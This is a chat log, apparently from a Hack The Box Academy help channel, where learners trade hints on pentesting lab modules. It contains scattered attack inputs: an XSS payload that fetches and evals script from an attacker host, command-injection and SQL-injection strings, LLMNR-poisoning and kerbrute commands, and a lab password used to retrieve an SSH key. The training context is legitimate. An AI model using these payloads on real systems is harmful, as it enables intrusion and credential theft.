What are the chances it's a bug from their site, cause similar command worked on my local machine

low, but you can always reset the machine

Cannot find pathNo hashes loaded.

hey guys I am on the CPTS Footprinting Lab - Medium and I want to understand if we can use exploits here or that was not possible only for the EASY one. Thanks.. 🙂

I am still stuck in this module's pit. I wouldn't be able to answer the last three questions of the skills assessment if my life depended on it. I have easily invested 12 hours in that and I go over the module again, and the cheat sheet, and try everything and anything I can... fail. 😢 If someone is reading this who has gotten the last 3 questions, please DM me and give me a clue as to where to go because everything I tried has been a dead end. I totally found the email address too, but it's not the right one. Gaaaaaaaaaaaaaaaaaaaaaaaaaaaaaah!!!!!

Still same 😞

Even the next question after it, it asked to find the number of files with .bak extension

It returned 1 file but the answer seems incorrect 😩

Reread the question and redo the examples

I did the right way and it works thx ! However I'm not sure about why I didn't get it with tshark :/

I think the Lateral Movement Section from Attacking Enterprise Networks is broken. I've tried to do a Host Discover and all the hosts are up except 172.16.8.50 . I need this host to use evil-winrm and move onto the next host. Can anyone verfiy that this problem exists? Is there someone that I can contact to fix this problem?

I didn't have any issues moving around

I suggest doing this module blind as well, since the module is the walkthrough.

If you suspect an issue, reset the lab and get back to that point

Deleting the output bc spoilers

I did serveral times. Is 172.16.8.50 up on your screen?

It was when I did it months ago

Reach out to support

Change vpn regions, sometimes that fixes random errors

ok thanks

Does anyone have the commands necessary to download the Default-creds-cheatsheet from the Password reuse/Default section? Trying to download it to my Parrot OS VM but the commands are for Kali

hey guys I'm interested ethical hacking I would like to work of the government like some of those guys in the shows like in scorpion I'm asking for some guidance as I'm a beginner

Why would it be any different, i just right-click -> copy link -> wget [paste]

Scorpion is heavily glorified. I'll give you props for not saying Mr. Robot though.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

I was following the manual installation steps on the github page

On the gh page?

Oh right

I didn't download thar

That*

I just used the website csv and ctrl-f

gh would generally be git clone

Also kali and parrot are both debian

So should be similar/same regardless

Hi

yo can someone help me with one of the modules

its called web proxies

in the skill assensment section i need to send a request to a server using a custom cookie i get 31 characters of , then "fuzz" the last character using a wordlist from seclist called alpha-num.txt , after that encode it using base64 then ascII-hex then send it to the IP:PORT/admin.php

the problem is IDK if i should send it as a post request or as a Get request , i have tried them both and both ain't working , i am encoding the entire thing reversably after getting the MD5 hash

as the hint told me

its quite hard to explain writing this

i don't have discord on my linux and its kinda annoying to install it

also quick question why is there no voice chats ?

am starting my journey on introduction to infomation security foundations, module 2 that is leaning process last part learning progress, i am not able to answer the last qustion :What is the difference between the two numbers of the learning progress mentioned above? these are the figures (1.00)365 = 1.00
(1.01)365 = 37.7 and the hint is 37.7-1.00, i know one who had done it can relate. kindly i need help on this

The payload option should allow you to add a prefix, which is the 31 characters you decoded

yeah i did

And you can send as a GET or POST

After that you should check the results of each request until you see the flag

Math

i also did thats why i am confused , the response i get is a SET-cookie from the server along with the login screen from the IP:port/admin.php

Then you encode the cookie value and re-encode it in reverse

So step a -> b -> c to decode you do c -> b -> a to encode

i first added the prefix , then added the payload to the payload simplest section (alpha-num-case.text) (which are numbers from 0-9-a-z-A-Z)
then encode as base64 , then encode as ASCII-hex

yeah i did that too

Id that the right reverse order?

yeah

and yes i counted 88 characters too

I didn't count the characters

i didn't at first then i did because the hint says so

am grateful. am sorted

But when you have it highlighted, you have the entire cookie value portion highlighted when you go to send the payload yeah?

no i added 2 of the thinges where it doesn't highlight the entire payload it (because its between the two thinges)

Also this may sound dumb @pearl gulch , but try resetting the target

i have

for the 7th time now xD

You only need to encode the cookie=§value§

exactly what i did

cookie : sessionid=§§

exactly like this

either i am high or something is high

Put something random in between

Just to be safe

It might not like it being empty

bruh

ok let me try

bruh let me just install discord on linux

You won't be able to screenshot anyway

You need to link your account via the directions in #welcome to post images/screenshot

ok ?

btw its me its just my other account

about to try it one moment

nope same thing

reach out to support then ¯_(ツ)_/¯

Green bubble on website

Hello,
I'm having trouble with Command Injections > Identifying Filters.

I'm using ZAP proxy to fuzz the POST request with different operators and their url-encoded version. I'm also adding the whoami command at the end to see if the server actually does execute it. My problem is that I never see the output of the command, it's either an error or the simple ping output.

I suspect it's because of how ZAP encodes my payload, so I also tried with curl on the command line and it's the same problem.

I think what could help me is a hint of a curl command that would work, or of how to specify encoding in zaproxy...

ok just to make sure i'm going to send picture to what i am doing

Some characters you might have to encode. Like the new-line character (%0a i believe)

uh what is "account identifier" ?

It's explained in the welcome section, it's on app.hackthebox.com <-

got it

i can send pictures :))

Okay but I tried that, I tried sending POST requests containing :
1.1.1.1\nwhoami
1.1.1.1%0awhoami
And litterally:
1.1.1.1
whoami
These returned the execution of the ping 1.1.1.1 command but nothing else.

all 3 pictures

if anyone finds the problem please @ me

hi, im in kerberos attacks module doing Unconstrained Delegation - Users and i cant RDP into the box

this is the 3rd time i try

I am able to authenticate with all the linux modules though

Hello all. I'm going through the CPTS path, currently I'm on the last Attacking Enterprise Networks module. Today I finished Internal Information Gathering section but I have noticed something strange and I can't explain it to myself. I set up dynamic port forwarding using SSH. When I tried to verify if everything is ok by using nmap (using -Pn -sT) scan against ports of the already compromised host, but with the second IP of the NIC interface I got that these services are filtered . I looked the firewall rules to check if there any rules for the second interface but didn't find anything, checked also if the host is part of AD, but it isn't. After a while I decided to take a look at the walkthrough from the section and noticed that they used the same approach, but on their nmap result the ports are opened. Probably they made some changes on the box but didn't updated the walk through. Anyway, I'm just wondering if anyone can explain me why I see these services as filtered although they are opened and there are no FW rules. Is it related to the proxychains do I miss something. Sorry for the long explanation. Would appreciate your help!

Maybe update your nmap

Hey, has anyone managed to identify the second vulnerability in the "Intro to Whitebox Pentesting" module? (skill assessment)
||I've successfully read the flag via the /ping endpoint||

Hmm this is a good idea. Didn't come to my mind 😅 I used the pwnvox provided from HTB not sure what version is installed there but will try.

Just checked nmap version is 7.94SVN which is already the newest version

hey guys, why rubeus does not works?

might have been corrupted during transfer

to make sure im using right version, could you suggest me where i can download it?

if you're doing the ad enum and attack module, it should just be the one in C:\tools\ iirc but otherwise that's the version of tools i use

@unreal tartan . this channel

I just want to inform you for my case. I decided to perform the dynamic port forwarding from my kali VM, using the exact same approach, scanning services now returned open . parrot nmap version is 7.94SVN kali nmap version is 7.93 proxychains on both machines is 4.16-2 I went back to parrot os and downgraded the nmap version to 7.93 and now proxychains nmap works perfectly it shows the ports as open. I guess there are some issue with nmap 7.94SVN

Kali on top

I like it more too. But when I don't use my personal PC I use the provided box from HTB. Anyway I'm glad I was able to fix it there as well, almost all day I was pulling my hair 😄

Good Afternoon people. Someone can help me with that?

could anyone help with alert machine? i found the vulnerability and got the admin to press link but something is wrong w my payload idk what tho

#boxes

i can't find the flag.txt of module File inclusion

hello?

HELLO??!!!

hello

Have you tried the techniques from the module? You may need to combine some

Good way to improve on HTB?

Research, skill

mmm i'm noob 😦

Well the module teaches you everything you need to complete it

¯_(ツ)_/¯

Being a noob doesn't excuse you

do youuu?

oh my good

?

same

i don't know how put in the flag.txt

you can either type it out or copy and paste

too i want that

neither i want that

Type shi

hey did you ever figure this out?

anyone knows whats wrong with this ?

idk

yeah same thats why i am asking 😦

Has anyone had an issue with the nmap scripting engine question and getting a no file error for the text file?

Hey friends,
I'm 6 weeks in my cyber journey, and as one should, I'm finding this whole thing fun but challenging.
Is there newbies like me who are looking to work on boxes together, kinda of like a study group?

I feel like bouncing ideas would be a great way to advance through these challenges without the help of writeups

Hopefully this is the right forum for those types of questions.
If interested DM so we can setup a room.

Cheers

Tchou

Hi

it's best to post this in #1225791307256168448

will do! thanks for the speedy response

hello guys i need help on "Footprinting Lab - Hard" what i did so far that i tried to connect to the pop3 service and imap service and i found ssh cerficate but i think it is useless since it is not the private key . i found SNMP open but everytime i enumrate it i get "no connection "

Ok

why's that happening

i used braa ||braa backup@10.129.108.34:.*|| still not finding much

Salutations

for the pass the ticket from linux section of password attacks I am logged in as Carlos and I got his crontab and I see a script in his crontab

I run it but it starts to take long to run and there's a results file so

What would you all say,is the HARDEST thing in technology

maybe try something else

And which coding language is it

like what ??

I stop the script as I don't know if it will get the results I'm looking for in the file

something else

I'm trying to get the creds for svc workstations

so will running that script get me that and store it in results file?

idk

i tried to read imap and pop3 though openssl also enumrate SNMP with braa

this isn't a general chat, this is for discussing HTB Academy modules

I can't talk in general after verifying and everything,I'm not sure how,it made me talk here in module's

Oh wow I can't spell

you must verify your account by using the /identify command with your account identifier from app.hackthebox.com

Ok ill retry,thanks.

i found tom and i think a password

awesome stuff

ok so a while ago I got the flag in the svc_workstations directory but

how do I get into svc_workstations account?

which is the next question because I need to ssh into that

in order to be able to use sudo for privesc

idk

Huzz

on the skills assement for xss im trying to get a cookie but the webserver keeps throwing GET script.js and doesnt even return the document cookie

Don’t you get the password?

Need to see what it looks Iike

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>

I am having trouble getting the password hash

I am trying to figure out how to get the ticket

the kerberos ticket

for svc_workstations

Kinda confused what I’m looking at

Which one are u sending?

i believe top is script.js, bottom is index.php

the bottom one is my xss payload calc

oh, i am misread

Just use src=IP

Tf you mean src=IP

maybe try a different payload

The examples they used for the module was just <script src=ip></script >

Yeah and try the image payload

and check if you actually put your ip address in script.js

because the cookie you're trying to access is flagged as httponly?

Isn’t it in the temp folder?

can someone give me a hint as to what I need to do to get password in order to ssh in as svc_workstations?

hold on I thought it wasn't let me check again

i don't recall there being any HttpOnly flags set in the Skills Assessment

no

i might be wrong 😉

its not in tmp folder

in fact svc_workstations is not listed there

I remember getting the password for that user

all the other users are listed

So it must be in a keytab or something

ok

where can I look? I wrongly assumed twice it would be in /tmp

idk

aside from you telling me that but also its like I check Carlos's keytab and its not there either

I'm kind of confused

Been a while, lemme see

What section?

hello guys i need help on "Footprinting Lab - Hard" i have the tom user and password found on ||snmp|| i tried to curl imap ||curl -k 'imaps://10.129.108.34/' --user tom:pass -v|| but i found nothing , any help ?

please

I DID IT

awesome!

guys any help or hint ?

Use openssl s_client to connect to imaps

okay i did but i used ||curl -k 'imaps://10.129.108.34/INBOX?ALL' --user tom:NMds732Js2761 -v|| and found nothing

That’s not what I said

sorry wait i already did that

found ssh key i tried to connect with it but i think it is public key

If you have the private key you can just ssh to root right

yes

Lol

i tried to do chmod 600 to id_rsa file but i think i did something wrong

maybe generating a new keys ?

no

what

If you got the ssh key from imaps, you can ssh with that to root

Make sure it’s properly formatted

okay wait

i got this

─# ssh tom@10.129.108.34 -i id_rsa
Load key "id_rsa": error in libcrypto
tom@10.129.108.34: Permission denied (publickey).

I said root

Not Tom

the password is that

?

i found it on SNMP

Yes that’s for tom

That’s how you login to imaps and get the ssh key

Then you ssh as root

Not tom

Yeah it’s where the crontab listed it

Theres another file in the directory

you are a hero man

thank you

Qhat did you do to fix it

You have to use a diffrent payload

Just do what Session Hijacking taught you and thatll be it

You’re welcome

i finished the entire CBBH path, how should I revise now to ensure I know what im doing

yeah it just kinda hangs for me

how can anyone possibly answer that for you

thats person to person dependent

thats just 'how well did you grasp the material?'

I would go back to where you first landed when you gained access as Carlos. Start enumerating there.

of course its person dependent, isnt everything in life?

yes, some things more so than others

so you agree there are situations where the answer is clearer or more defined

in this case, there'll be no need to be dismissive

I do agree. Im saying this isnt one of them

Nobody can tell them if theyre ready or not

or what they need to still work on

someone might think that is a question worth answering in a concrete step by step fashion

if you think im wrong then answer the question, what should they revise to ensure theyre ready?

i haven’t done the path so i wouldn’t know

lmao

so I say "nobody can answer that for you because nobody but you knows how ready you are" and you disagree but have zero things to actually add

👍

so in your own words readiness is a personal judgement

you can only assess your own knowledge and no external party can judge how prepared you are?

thats what exams are for. the question was how they could ensure they know theyre ready. and the answer is nobody can do that for them. they need to sit down and judge the confidence of their own knowledge

Im not being dismissive, im saying the answer is looking inward

write down what you struggle with and review those concepts

you’re not being dismissive

but you’re definitely falling into the trap of oversimplification

you told me I was

why tf you arguing when you have nothing to contribute to the discussion

you dont like my advice but have none to offer of your own, noted.

it’s not your advice lol

it’s about acknowledging there’s a better approach to revision

to which you didnt offer one

i don’t need to?

then shut up lmao

youre spamming up the channel

i’m saying revision isn’t a one size fits all process

dont care. move along

alright buddy

okay I dont know where to go with this skill assement i tried the payloads they gave me but no luck

9/10 times its because you should craft a payload from what you learned, not necessarily one of the examples they gave you

which module

sql injection

kind of hard to construct a payload when all it says is invalid credentials

ah that part, youre overthinking things. just be more thorough

ive tried ' or '1'='1

and every variation of it

not enough variations

i dont know what to do lmao

unfortunately youre close enough that there really isnt any advice that isnt just telling the answer

youre on the correct track

im so stuck

db.sql isnt the answer is it?

You fell right into the troll😭

its my specialty lul

i refuse to look up the answer

like I said you were already on the right track. just need more variations

where should I look for more variations

your brain. think em up

Hey guys quick question about burp, i need to set my proxy when i launch a auxiliary from msf (to check for robots.txt file), and look in burpto the request it makes, and i need to give the last line of the request they sey "it starts with "msf"" but in my request i don't have tat any idea? module web proxies

there's a tool for this

im not using sqlmap

sqlmap doesnt work for that part anyways

trying to do this manually?

Yes!

as they should

hell yeah

maybe its a diffrent dbms

there's a wordlist for this

The login page part?

yes

Think super super simple

ive tried or 1=1 it doesnt work

exact syntax is important

no shit

its a reminder, go away troll

Did u comment out the rest?

my bad i used the wrong auxiliary -_-

OHHHHH

jeez thanks for being helpful at least fox tried

not contributing anything but complaining about others is their specialty

I have the exact payload in my notes lol the goal is to get vader to realize their own mistakes and discover the solution themselves

awesome

I got it

congrats

Hashtag is a hell of a drug

didnt use one in my payload but more than one way to skin a cat

In section "LLMNR/NBT-NS for windows" in Active directory Enumeration and Attack module

No matter how long I wait, any NTLM hash doesn't appear on the console.
has anyone resolved it??

how do you set up responder?

I used inveigh in the same way the section material says,

Import-Module C:\Tools\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

It captures LLMNR, NBNS, DNS messages well but not NTML hash

Are you running as admin?

iirc hashes are only sent when victim tries to authenticate with smb

how long did you wait too? its been awhile but I vaguely recall one of those modules having awhile before the hash showed up

Thank you very much. I didn't ran a powershell as admin.
Right after trying it, I got a NTML Hash captured

NTLM; the order matters

am i supposed to be reading dashboard.php

or is that a non sequitor

wait got it

If anyone has been here, I am stuck. Just a nudge on question 3 might be enough to get me to question 4 and so on... if you are out there, please help.

Information Gathering - Web Edition | Final Assesment

keep trying to find diffrent subdomains.

those hosts have to be wrong

.htb is a fake tld, you're pointing it to a real IP

could be totally wrong as i didn't do that update module but i've never seen a htb module setup like that

It's a subnet used for challenge / docker spawns, so could be legit

it is

but I don't know for sure either, sorry

alright fair enough don't listen to me

Nah you're good

It's cool, I don't know shit either.

One of us, one of us

😄

https://tenor.com/view/smart-gif-9596539

As for a wordlist of choice, if it's from a module, I'd imagine they would hint to a wordlist to use in there - you shouldn't have to use a top 1 million least at the least

I use gobuster vhost with -t 200 at the end and it flies pretty quick

Our poor cluster

😅

Got a link to the module / section?

I think I am onto something.. no worries. https://academy.hackthebox.com/module/144/section/1311 if I am wrong I'll be back.

Nice one 🙂

Very thanks

Were you able to figure this one out? I'm getting a connection but no DC01 ticket.

he was using the wrong credentials i believe

I thought you were given one vhost, a target IP, and port?

I'm stuck like chuck on this one. How did you extract the TGS ticket of DCO1$?

I'm getting a connection, but no TGS ticket.

Were you able to figure this one out? I'm stuck in the same spot you were in. Any help?

just waited 10 minutes for DNS to recache

Hi, who can give me a hint in Advanced SQL Injection Skill assessment (RCE)? It seems that CREATE function doesnt work. I read the hints from the history, tried to exploit using sessions from the different users, but the create function seems not work at all

Question 4 and 5 are now solved using ReconSpider and adding www.inlanefreight.htb to the hosts file, now I just need to figure out question 3 and I can be done. At least I made progress tonight.

To answer that you have everything you need. It's just a matter of thinking very simple and the hint is in the first paragraph of the scenario.

hello, i stuck on mitm for access to private api, someone know how to acces?

Hello such partners some alternative tools to kirbi2john.py?

kirbi2hashcat?

Thank you I think I did the same Kirbi2John.py function

Is there a section in the module where we can practice PetitPotam or we have to find a machine/lab it ?

I don't recall, but from the modules I think we could only practice nopac

nah

Keep it simple, pillage what you can and use that

also, tools that can generate payloads can come handy

Don't look for CVE's just yet

whats EoP

Elevation of Privilege

oh

Do you have the necessary privileges for them to work?

the first skill assessment?

-c flag

juicypotato

i gave you all thats needed

Not sure, I'm confused as you mentioned the final assessment of the module and later on it turns out to be the first skills assesment

AD enum and attacks -> bleeding edge vulnerabilities

I need help with the skill assessment for Parameter Logic Bugs. I have a hard time finding || A function which I can use to get free subscriptions||

Yeah, but I dont think it has ADCS configured which is required

Hey there, having trouble during the web proxies module:

I'm currently doing the web proxy module from the academy,
typing this in the command prompt
nmap --proxies http://127.0.0.1:8080 SERVER_IP -p55379 -Pn -sC
It gives me the result of the scan but nothing can be found on the burp's history
If anyone know why, I'll be glad to read you ^^

I tried with proxychains command and it outputs me the same

dm the command

I was able to find my metaxploit activity in the history btw so this is realy weird to me

In module "Password Spraying - Making a Target User List", i should enumerate user list in domain with kerbrute tool to solve the problem

for example,
"kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt "

in this problem, how can i know the domain controller's IP??
has anyone solved it?

By scanning the network

Thank you i found the domain controller with responder and nmap scanning

I'm able to register one of the ordinary subscriptions and unlock most of the content but still experience problems when getting the right subscription

Hello, I'm doing Command Injections > Identifying Filters
The web server runs a ping command and I'm supposed to inject it by fuzzing different operators and their url-encoded version:
1.1.1.1;whoami
1.1.1.1&&whoami
My problem is that none of the commands work. I'm using ZAP and I either get a response saying "Invalid input" or I just get the result from the PING command and never the result from the whoami command.
Can anybody explain what I'm doing wrong?

in windows attack and defence, the vm does not have the 'passwords.txt' dictionary file and I cant seem to find any reference to it. Any help? Am i missing something?

Hi,

Path: Penetration testing (JOB ROLE)
Module: Information gathering
Section: DNS Zone Transfers